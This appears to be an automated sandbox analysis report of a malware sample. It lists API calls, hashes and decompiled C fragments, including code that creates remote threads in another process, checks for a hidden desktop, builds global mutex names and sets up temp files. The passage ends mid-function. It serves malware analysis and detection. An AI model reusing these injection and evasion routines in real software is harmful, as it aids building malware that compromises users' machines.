    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Thread$CurrentObjectPathPriorityQuoteSingleSpacesWait
    • String ID:
    • API String ID: 2045921288-0
    • Opcode ID: 93bf2ba2f5dedabc5307c0d002b7dd510de7977bf18bf1a224c0fff037684c8b
    • Instruction ID: 5e719791a775b69305ddd3397e25d0dbd76fbc9f9030c4b2e13e69ae5a149ece
    • Opcode Fuzzy Hash: 93bf2ba2f5dedabc5307c0d002b7dd510de7977bf18bf1a224c0fff037684c8b
    • Instruction Fuzzy Hash: C321023192020A9BDB21EBB4FCD8BEE777DEF60784F10415AD706AB154DE709E588B90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000002,00000000), ref: 012B6F09
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 012B6F33
    • WSAGetLastError.WS2_32(?,?,?,00000002,00000000), ref: 012B6F3A
    • WSAIoctl.WS2_32(?,48000016,00000000,00000000,00000000,?,?,00000000,00000000), ref: 012B6F66
    • closesocket.WS2_32(?), ref: 012B6F7A
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Ioctl$ErrorLastclosesocketsocket
    • String ID:
    • API String ID: 2507967184-0
    • Opcode ID: e150cc40d058bf1d2105923eddd5bcdde8a44837b1def4a567649af403c51fd1
    • Instruction ID: c41f65a7382bff1667cbf0cfa1ad70d70a7f500c401dc1b1a92ccc586bef0a92
    • Opcode Fuzzy Hash: e150cc40d058bf1d2105923eddd5bcdde8a44837b1def4a567649af403c51fd1
    • Instruction Fuzzy Hash: 36111FB1C12119BBDB209BA9EC8CCEFBF7CEF453A4B504255F616E2194D6305A41DBA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B716D(long __ecx, HANDLE* __edx, signed int _a4, long _a8) {
    				long _v8;
    				long _v12;
    				HANDLE* _v16;
    				struct tagMSG _v44;
    				long _t19;
    				long _t29;
    
    				_v16 = __edx;
    				_v8 = __ecx;
    				_t19 = MsgWaitForMultipleObjects(__ecx, __edx, _a4 & 0x000000ff, _a8, 0x4ff);
    				_v12 = _t19;
    				if(_t19 == _v8) {
    					L4:
    					while(PeekMessageW( &_v44, 0, 0, 0, 1) != 0) {
    						if(_v44.message != 0x12) {
    							TranslateMessage( &_v44);
    							DispatchMessageW( &_v44);
    							continue;
    						}
    						L6:
    						goto L7;
    					}
    					_t29 = MsgWaitForMultipleObjects(_v8, _v16, _a4 & 0x000000ff, _a8, 0x4ff);
    					_v12 = _t29;
    					if(_t29 == _v8) {
    						goto L4;
    					}
    					goto L6;
    				}
    				L7:
    				return _v12;
    			}










    APIs
    • MsgWaitForMultipleObjects.USER32 ref: 012B7191
    • TranslateMessage.USER32(?), ref: 012B71AE
    • DispatchMessageW.USER32 ref: 012B71B8
    • PeekMessageW.USER32 ref: 012B71C9
    • MsgWaitForMultipleObjects.USER32 ref: 012B71DE
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
    • String ID:
    • API String ID: 4084795276-0
    • Opcode ID: 07e256f1b64cb2337e16a23d66aae82928703bd80c8fb600376ee5faa3c8cbe5
    • Instruction ID: 61323998cb0cd3447b96bac43ffe2a5e65b1e508a43b9be3486d4e8f3add19c2
    • Opcode Fuzzy Hash: 07e256f1b64cb2337e16a23d66aae82928703bd80c8fb600376ee5faa3c8cbe5
    • Instruction Fuzzy Hash: 3B1115B6C20119BFDF10DBA9DD88CEEBFBCEB88311F148466EA05E3144D2709A449B74
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E012CE3A7(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
    				int _t20;
    				signed int _t21;
    				struct HWND__* _t28;
    				char* _t32;
    
    				_t28 = _a4;
    				if(( *0x12dc738 & 0x00000004) == 0 || L012B150A() == 0) {
    					L9:
    					return GetUpdateRect(_t28, _a8, _a12);
    				} else {
    					_t32 = TlsGetValue( *0x12dd83c);
    					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
    						goto L9;
    					} else {
    						if(_a8 != 0) {
    							_t6 = _t32 + 0xc; // 0xc
    							L012B1947( &_a8, _t6, 0x10);
    						}
    						if(_a12 != 0) {
    							_t20 = SaveDC( *(_t32 + 8));
    							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
    							RestoreDC( *(_t32 + 8), _t20);
    						}
    						 *_t32 = 1;
    						return 1;
    					}
    				}
    			}








    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: MessageRectRestoreSaveSendUpdateValue
    • String ID:
    • API String ID: 1426479601-0
    • Opcode ID: bc24f5709fc339ae88df2a753c791544ceb85ec01c7930e9d05e32420af3f707
    • Instruction ID: ca7b3ed9569bcb0a479b173a1487714124c3ceba402f71ce18a60eccf2cc593d
    • Opcode Fuzzy Hash: bc24f5709fc339ae88df2a753c791544ceb85ec01c7930e9d05e32420af3f707
    • Instruction Fuzzy Hash: CF118232411746EFDB329FA4EC8CFAABFA8EB08711F058919FB96C6054C730A050CB60
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • OpenProcess.KERNEL32(0000047A,00000000,?), ref: 012C2EEC
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0258DF2B,00000000,00000000,00000000), ref: 012C2F1E
    • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 012C2F31
    • CloseHandle.KERNEL32(?), ref: 012C2F3A
    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 012C2F4E
    • CloseHandle.KERNEL32(00000000,?), ref: 012C2F55
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
    • String ID:
    • API String ID: 14861764-0
    • Opcode ID: 164102a83bf6b0f342a11bd01864867f4ba72af6b9f989bf8935906cbcafefa9
    • Instruction ID: b3fc47a7f4fbacc1d33505c55b40ae2ca5251fbbdff0f7f79b76f464b0b8a333
    • Opcode Fuzzy Hash: 164102a83bf6b0f342a11bd01864867f4ba72af6b9f989bf8935906cbcafefa9
    • Instruction Fuzzy Hash: 3A01D8B251424DBFEB211FA8ECCCDEE3FADEB45294B014428FB0686100CB759D168761
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E012CE59F() {
    				struct tagMSG _v32;
    				signed int _t12;
    
    				SetThreadPriority(GetCurrentThread(), 1);
    				SetEvent( *0x12dd844);
    				while(1) {
    					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
    					if(_t12 == 0xffffffff) {
    						break;
    					}
    					if(_t12 == 0) {
    						break;
    					}
    					if(_v32.message ==  *0x12dd840 && _v32.wParam == 0xfffffffc) {
    						_push(1);
    						_push( *0x12dd848 + 0x114);
    						 *((char*)( *0x12dd848 + 0x124)) = L012B1663(0x12dd838, _v32.lParam);
    						SetEvent( *0x12dd844);
    					}
    				}
    				return _t12 & 0xffffff00 | _t12 == 0x00000000;
    			}






    APIs
    • GetCurrentThread.KERNEL32 ref: 012CE5A9
    • SetThreadPriority.KERNEL32(00000000), ref: 012CE5B0
    • SetEvent.KERNEL32 ref: 012CE5C2
    • SetEvent.KERNEL32(?,00000001), ref: 012CE60D
    • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 012CE619
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: EventThread$CurrentMessagePriority
    • String ID:
    • API String ID: 3943651903-0
    • Opcode ID: aa47d53c15846322fa30cbdb2c577f628da7be26096e0d71d29041cbac0802f9
    • Instruction ID: 8607d6ecb395865f445b89ad1bee2a39d88ccc3610f5c10c27d02c0caf5a7d00
    • Opcode Fuzzy Hash: aa47d53c15846322fa30cbdb2c577f628da7be26096e0d71d29041cbac0802f9
    • Instruction Fuzzy Hash: DB01B131D116199FCB21AAACFC4EF9A3BB9AB84B20F250314E714D71C5DA60A402CB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,762EA660,012CD43B,00000000), ref: 012CD008
    • ReleaseMutex.KERNEL32(?), ref: 012CD03C
    • IsWindow.USER32(?), ref: 012CD043
    • PostMessageW.USER32(?,00000215,00000000,?), ref: 012CD05D
    • SendMessageW.USER32(?,00000215,00000000,?), ref: 012CD065
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
    • String ID:
    • API String ID: 794275546-0
    • Opcode ID: dd0e75df34e8abde754914f7cdb33fda2391d6937f3313ca433f6caa8dfb1cec
    • Instruction ID: 6455ea567c38c5a959ca0613c50820b933f4f8c81a6c2dca9da278a59d60e5dc
    • Opcode Fuzzy Hash: dd0e75df34e8abde754914f7cdb33fda2391d6937f3313ca433f6caa8dfb1cec
    • Instruction Fuzzy Hash: 34F03C78504700DFD3209F28E94CD6ABBF5FB99711B058A6CFA9687355C770A841CB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E012B2E60(void* __esi) {
    				intOrPtr _v8;
    				signed int _v12;
    				char _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				intOrPtr _v32;
    				signed int _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				signed int _v52;
    				char _v116;
    				signed int _v120;
    				void* _t68;
    				signed char _t73;
    				long _t77;
    				signed char _t82;
    				void* _t94;
    				signed int _t107;
    				signed int _t108;
    				void* _t114;
    				signed int _t164;
    				void* _t166;
    				void* _t167;
    
    				_t166 = __esi;
    				L012B1654(_t68);
    				_v8 = L012B1780(0x743c1521, 2);
    				if(_v8 != 0) {
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t73 = L012B150A();
    					__eflags = _t73 & 0x000000ff;
    					if((_t73 & 0x000000ff) == 0) {
    						L22:
    						L012B1492(_v8);
    						__eflags = 0;
    						return 0;
    					} else {
    						goto L3;
    					}
    					while(1) {
    						L3:
    						_t114 =  *0x12dcc54; // 0x0
    						_t77 = WaitForSingleObject(_t114, 0x1388);
    						__eflags = _t77 - 0x102;
    						if(_t77 != 0x102) {
    							goto L22;
    						}
    						_v12 = L012B1843();
    						__eflags = _v12;
    						if(__eflags == 0) {
    							L21:
    							continue;
    						}
    						_v20 = L012B1AAA(_v12, __eflags, 0x20000000,  &_v16);
    						__eflags = _v20;
    						if(__eflags == 0) {
    							L20:
    							L012B1933(_v20);
    							L012B1933(_v12);
    							goto L21;
    						}
    						_t82 = E012B2BF0(_v20, _v16, __eflags);
    						__eflags = _t82 & 0x000000ff;
    						if((_t82 & 0x000000ff) == 0) {
    							goto L20;
    						}
    						_v24 = _v20;
    						do {
    							_v28 = _v24;
    							_v32 = L012B1717(_v24, 1);
    							_v40 = L012B1717(_v24, 2);
    							_v36 = 0;
    							_v52 = L012B1523(L012B1BE0(_v28), _v28, _t86, _t166);
    							_v48 = L012B1523(L012B1BE0(_v32), _v32, _t88, _t166);
    							_v44 = L012B1523(L012B1BE0(_v40), _v40, _t90, _t166);
    							_push(_v44);
    							_push(_v48);
    							_t156 = _v52;
    							_t94 = L012B1A8C( &_v116, 0x20, L"Global\\%08X%08X%08X", _v52);
    							_t167 = _t167 + 0x18;
    							__eflags = _t94 - 0x1f;
    							if(_t94 == 0x1f) {
    								_t156 =  &_v116;
    								_v36 = L012B177B(0x12dc7c8,  &_v116);
    							}
    							__eflags = _v36;
    							if(_v36 != 0) {
    								_v120 = L012B1C17(0x10);
    								__eflags = _v120;
    								if(_v120 == 0) {
    									L18:
    									L012B1492(_v36);
    									goto L19;
    								}
    								 *_v120 = L012B12A8(_v28, _t156 | 0xffffffff);
    								 *((intOrPtr*)(_v120 + 4)) = L012B12A8(_v32, _t156 | 0xffffffffffffffff);
    								 *((intOrPtr*)(_v120 + 8)) = L012B12A8(_v40, _v120 | 0xffffffff);
    								 *(_v120 + 0xc) = _v36;
    								__eflags =  *_v120;
    								if( *_v120 == 0) {
    									L17:
    									L012B1933( *_v120);
    									L012B1933( *((intOrPtr*)(_v120 + 4)));
    									L012B1933( *((intOrPtr*)(_v120 + 8)));
    									L012B1933(_v120);
    									goto L18;
    								}
    								_t164 = _v120;
    								__eflags =  *(_t164 + 4);
    								if( *(_t164 + 4) == 0) {
    									goto L17;
    								}
    								_t107 = _v120;
    								__eflags =  *(_t107 + 8);
    								if( *(_t107 + 8) == 0) {
    									goto L17;
    								}
    								_t108 = L012B1136(0x80000, E012B30C0, _v120);
    								__eflags = _t108;
    								if(_t108 <= 0) {
    									goto L17;
    								}
    							}
    							L19:
    							_v24 = L012B1717(_v24, 3);
    							__eflags = _v24;
    						} while (_v24 != 0);
    						goto L20;
    					}
    					goto L22;
    				}
    				return 1;
    			}





























    APIs
    • GetCurrentThread.KERNEL32 ref: 012B2E8E
    • SetThreadPriority.KERNEL32(00000000), ref: 012B2E95
    • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 012B2EB7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Thread$CurrentObjectPrioritySingleWait
    • String ID: Global\%08X%08X%08X
    • API String ID: 991781811-3239447729
    • Opcode ID: c4f261bfbc78644a93e56e0517d0c8a3803ef92e7c269530a8b09f2e638c262e
    • Instruction ID: 5047abc5440277be3fb4db4e453a2dd025c5c4476bc2dea31c215c11c4921e78
    • Opcode Fuzzy Hash: c4f261bfbc78644a93e56e0517d0c8a3803ef92e7c269530a8b09f2e638c262e
    • Instruction Fuzzy Hash: 80612E70E2010ADBDB14EBA4E9E4BFDB7B2BF94340F208628D1116B2D5DB756E51CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012BBA50(WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4, struct _STARTUPINFOW* _a8, intOrPtr _a12) {
    				char _v8;
    				struct _PROCESS_INFORMATION _v24;
    				char _v92;
    				struct _STARTUPINFOW* _t16;
    				WCHAR* _t26;
    				WCHAR* _t28;
    				WCHAR* _t29;
    
    				_t29 = __edx;
    				_v8 = 0;
    				_t16 = _a8;
    				_t26 = __ecx;
    				if(_t16 == 0) {
    					L012B15F5( &_v92,  &_v92, 0, 0x44);
    					_v92 = 0x44;
    					_t16 =  &_v92;
    				}
    				_t28 =  &_v8;
    				if(_t29 != 0) {
    					_t28 = _t29;
    				}
    				if(CreateProcessW(_t26, _t28, 0, 0, 0, 0x4000000, 0, _a4, _t16,  &_v24) == 0) {
    					return 0;
    				} else {
    					if(_a12 == 0) {
    						CloseHandle(_v24.hThread);
    						CloseHandle(_v24);
    					} else {
    						L012B1947(_a12,  &_v24, 0x10);
    					}
    					return _v24.dwProcessId;
    				}
    			}











    APIs
    • CreateProcessW.KERNEL32 ref: 012BBA9B
    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 012BBAC3
    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 012BBAC8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseHandle$CreateProcess
    • String ID: D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E012BE1EC(char __ecx, WCHAR* __edx) {
    				char _v524;
    				short _v1044;
    				void* _t11;
    				WCHAR* _t16;
    				void* _t21;
    				char _t22;
    				void* _t23;
    
    				_t16 = __edx;
    				_t22 = __ecx;
    				if(GetTempPathW(0xf6,  &_v1044) - 1 > 0xf5) {
    					L8:
    					return 0;
    				}
    				if(_t22 == 0) {
    					_t22 = L"tmp";
    				}
    				_t21 = 0;
    				while(1) {
    					_push(L012B122B());
    					_t11 = L012B1A8C( &_v524, 0x104, L"%s%08x", _t22);
    					_t23 = _t23 + 0x14;
    					if(_t11 == 0xffffffff) {
    						goto L8;
    					}
    					if(L012B1203(_t16,  &_v1044,  &_v524) == 0 || CreateDirectoryW(_t16, 0) == 0) {
    						_t21 = _t21 + 1;
    						if(_t21 < 0x64) {
    							continue;
    						}
    						goto L8;
    					} else {
    						return 1;
    					}
    				}
    				goto L8;
    			}

    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 012BE208
    • CreateDirectoryW.KERNEL32(?,00000000,?), ref: 012BE261
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CreateDirectoryPathTemp
    • String ID: %s%08x$tmp
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012C868E(long __eax, char _a4) {
    				long _t2;
    				WCHAR* _t9;
    				void* _t16;
    				void* _t29;
    
    				_t2 = __eax;
    				_t9 = __eax;
    				if( *0x12dd320 == 0) {
    					_t16 = 2;
    					L012B15E6(_t16, 0x12dd320);
    					L012B164F(0x12dd528, 0x12dd320, 0xffffffff);
    					_t2 = PathRemoveFileSpecW(0x12dd528);
    				}
    				if(_t9 != 0) {
    					L012B164F(_t9, 0x12dd320, 0xffffffff);
    					_t2 = PathRenameExtensionW(_t9, L".tmp");
    				}
    				if(_a4 != 0) {
    					_t29 =  *0x12dc9fc - 1; // 0x0
    					if(_t29 > 0) {
    						L012B17E4(0x12dd528, 0);
    						L012B1BAE(0x12dd528, 1, 1);
    						_t2 = GetFileAttributesW(0x12dd320);
    						if(_t2 != 0xffffffff) {
    							return L012B1BAE(0x12dd320, 1, 1);
    						}
    					}
    				}
    				return _t2;
    			}

    APIs
    • PathRemoveFileSpecW.SHLWAPI(012DD528,000000FF,?,00000000,00000000,012C8E88,00000001,00020000,?,00A00000,00020000,?,00000004), ref: 012C86BD
    • PathRenameExtensionW.SHLWAPI(00000000,.tmp,000000FF,?,00000000,00000000,012C8E88,00000001,00020000,?,00A00000,00020000,?,00000004), ref: 012C86D8
    • GetFileAttributesW.KERNEL32(012DD320,00000001,?,00000000,00000000,012C8E88,00000001,00020000,?,00A00000,00020000,?), ref: 012C8704
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: FilePath$AttributesExtensionRemoveRenameSpec
    • String ID: .tmp
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012CEFBC() {
    				long _v8;
    				char _v108;
    				void _v208;
    				void* __esi;
    				void* _t8;
    				void* _t10;
    
    				_t8 = GetThreadDesktop(GetCurrentThreadId());
    				if(_t8 != 0) {
    					_t8 = GetUserObjectInformationW(_t8, 2,  &_v208, 0x64,  &_v8);
    					if(_t8 != 0 && _v8 == 0x4e) {
    						L012B137F(0x2937498d,  &_v108, 0);
    						_t8 = L012B1735( &_v208,  &_v108, 0x4c);
    						if(_t8 == 0) {
    							_t10 = E012CEB9B(0x12dd838, _t8);
    							if(_t10 == 0) {
    								_t10 = E012CEDF6(0x12dd838, 0);
    							} else {
    								 *0x12dc738 =  *0x12dc738 | 0x00000004;
    							}
    							return _t10;
    						}
    					}
    				}
    				return _t8;
    			}

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 012CEFC5
    • GetThreadDesktop.USER32(00000000), ref: 012CEFCC
    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 012CEFE6
      • Part of subcall function 012CEB9B: TlsAlloc.KERNEL32 ref: 012CEBB0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Thread$AllocCurrentDesktopInformationObjectUser
    • String ID: N
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E012B4FDD(void* __ecx) {
    				signed int _v8;
    				struct HINSTANCE__* _t7;
    				signed int _t8;
    				void* _t12;
    
    				_push(__ecx);
    				_v8 = _v8 & 0x00000000;
    				_t12 = __ecx;
    				_t7 = GetModuleHandleW(L"kernel32.dll");
    				if(_t7 == 0) {
    					L4:
    					_t8 = _t7 & 0xffffff00 | _v8 != 0x00000000;
    				} else {
    					_t7 = GetProcAddress(_t7, "IsWow64Process");
    					if(_t7 == 0) {
    						goto L4;
    					} else {
    						_t7 = _t7->i(_t12,  &_v8);
    						if(_t7 != 0) {
    							goto L4;
    						} else {
    							_t8 = 0;
    						}
    					}
    				}
    				return _t8;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 012B4FED
    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 012B4FFD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsWow64Process$kernel32.dll
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E012D1C95(void* __ecx, intOrPtr _a4, intOrPtr _a12) {
    				signed int _v8;
    				void* _t9;
    				int _t10;
    
    				_push(__ecx);
    				if(_a12 == 0x64 || _a12 == 0x33) {
    					EnterCriticalSection(0x12dda14);
    					_t10 = E012D104F(_a4);
    					_v8 = _t10;
    					if(_v8 != 0xffffffff) {
    						_t10 = SetEvent( *( *0x12dda2c + 4 + _v8 * 0x24));
    					}
    					LeaveCriticalSection(0x12dda14);
    					return _t10;
    				}
    				return _t9;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(012DDA14), ref: 012D1CAA
    • SetEvent.KERNEL32(000000FF), ref: 012D1CD1
    • LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D1CDC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalSection$EnterEventLeave
    • String ID: 3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E012C565A(void* __ecx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr* _t129;
    				char* _t130;
    				struct _CRITICAL_SECTION* _t138;
    				struct _CRITICAL_SECTION* _t147;
    				intOrPtr _t148;
    				void* _t149;
    				struct _CRITICAL_SECTION* _t155;
    				void* _t156;
    				void* _t161;
    				intOrPtr _t162;
    				intOrPtr* _t164;
    				intOrPtr _t171;
    				struct _CRITICAL_SECTION _t178;
    				void* _t181;
    				void* _t182;
    				void* _t183;
    				int _t187;
